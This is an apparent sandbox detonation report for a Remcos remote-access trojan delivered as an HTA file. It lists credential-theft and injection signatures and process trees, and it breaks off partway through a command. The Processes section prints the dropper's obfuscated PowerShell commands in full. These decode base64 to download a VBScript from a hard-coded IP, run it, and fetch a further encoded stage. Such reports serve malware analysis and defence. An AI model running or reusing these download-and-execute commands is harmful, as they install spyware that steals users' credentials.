Malware Analysis Report

2024-12-07 22:14

Sample ID 240806-zqhzsszgjp
Target INETHTMLPAGE.hta
SHA256 13cce0f3cd4d7c37976d04a6f7c8d656d1822ff8011617d130c2f2a121e4404f
Tags
defense_evasion discovery execution remcos remotehost collection credential_access rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

13cce0f3cd4d7c37976d04a6f7c8d656d1822ff8011617d130c2f2a121e4404f

Threat Level: Known bad

The file INETHTMLPAGE.hta was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution remcos remotehost collection credential_access rat spyware stealer

Remcos

Credentials from Password Stores: Credentials from Web Browsers

Detected Nirsoft tools

NirSoft WebBrowserPassView

NirSoft MailPassView

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Evasion via Device Credential Deployment

Checks computer location settings

Reads user/profile data of web browsers

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Modifies registry class

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 20:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 20:55

Reported

2024-08-06 20:57

Platform

win7-20240704-en

Max time kernel

16s

Max time network

22s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INETHTMLPAGE.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2124 wrote to memory of 2824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 2824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 2824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 2824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2824 wrote to memory of 2776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2824 wrote to memory of 2776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2824 wrote to memory of 2776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 2664 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2776 wrote to memory of 2664 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2776 wrote to memory of 2664 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2776 wrote to memory of 2664 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2664 wrote to memory of 2840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2664 wrote to memory of 2840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2664 wrote to memory of 2840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2664 wrote to memory of 2840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2776 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2776 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2776 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2776 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2216 wrote to memory of 2264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2216 wrote to memory of 2264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2216 wrote to memory of 2264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2216 wrote to memory of 2264 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INETHTMLPAGE.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yxua9fxg.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA4B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBA4A.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀c㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀LwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cgB2㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀dwBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bu㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀LgBj㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀cg㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YgBz㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀agBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀ZQBi㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bgB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB3㆛ ⺞ ⏬ ⦦ ⼀C0㆛ ⺞ ⏬ ⦦ ⼀TwBi㆛ ⺞ ⏬ ⦦ ⼀Go㆛ ⺞ ⏬ ⦦ ⼀ZQBj㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB0㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀VwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgB5㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀ew㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀dwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBE㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dwBu㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBh㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀R㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQ㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀aw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BX㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀aQB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀LQBI㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBG㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀bw㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀bwB3㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bm㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀bwBt㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀t㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀ZwBy㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀QwBv㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀UgBl㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀B9㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBu㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀dQBs㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀ZQBU㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Fs㆛ ⺞ ⏬ ⦦ ⼀UwB5㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀LgBU㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀RQBu㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀bwBk㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBn㆛ ⺞ ⏬ ⦦ ⼀F0㆛ ⺞ ⏬ ⦦ ⼀Og㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀FU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ 